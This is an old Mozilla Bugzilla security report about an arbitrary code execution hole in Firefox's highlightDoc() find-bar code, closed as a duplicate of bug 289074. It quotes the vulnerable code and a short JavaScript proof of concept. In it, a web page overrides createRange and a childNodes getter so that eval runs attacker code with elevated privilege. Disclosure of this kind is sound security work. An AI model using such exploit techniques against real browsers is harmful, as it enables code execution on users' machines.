security hole in highlightDoc()

RESOLVED DUPLICATE of bug 289074

Status

()

RESOLVED DUPLICATE of bug 289074
14 years ago
14 years ago

People

(Reporter: moz_bug_r_a4, Assigned: dveditz)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dupe 289074])

Attachments

(1 attachment)

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2

Vulnerability: arbitrary code execution

Vulnerable code:
from highlightDoc() in findBar.js

win = window._content;
var doc = win.document;
var body = doc.body;
var count = body.childNodes.length;
endPt = doc.createRange();
endPt.setStart(body, count);


Exploit:
Web pages can overwrite the getter and the method, such as the following.
usage of |eval| is similar to Bug 289074

  eval.setStart = eval.call;
  eval.__proto__ = document.createRange();

  document.createRange = function() {
    return eval;
  };

  document.body.__defineGetter__('childNodes', function() {
    return { length : MALICIOUS_CODE };
  });


I have confirmed that the following testcase works in:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+


Reproducible: Always

Steps to Reproduce:
(Reporter)

Comment 1

14 years ago
Created attachment 179680 [details]
testcase
Status: UNCONFIRMED → NEW
Ever confirmed: true
(Assignee)

Updated

14 years ago
Blocks: 256195

Updated

14 years ago
Flags: blocking-aviary1.0.3?

Updated

14 years ago
Blocks: 289187
Same eval problem as reported in bug 289074.

*** This bug has been marked as a duplicate of 289074 ***

*** This bug has been marked as a duplicate of 289074 ***
No longer blocks: 289187
Status: NEW → RESOLVED
Last Resolved: 14 years ago
Resolution: --- → DUPLICATE
(Assignee)

Updated

14 years ago
Whiteboard: [sg:dupe 289074]

Updated

14 years ago
Flags: blocking-aviary1.0.3?
(Assignee)

Updated

14 years ago
Group: security
(Assignee)

Updated

14 years ago
Blocks: 256197
(Assignee)

Updated

14 years ago
No longer blocks: 256195
You need to log in before you can comment on or make changes to this bug.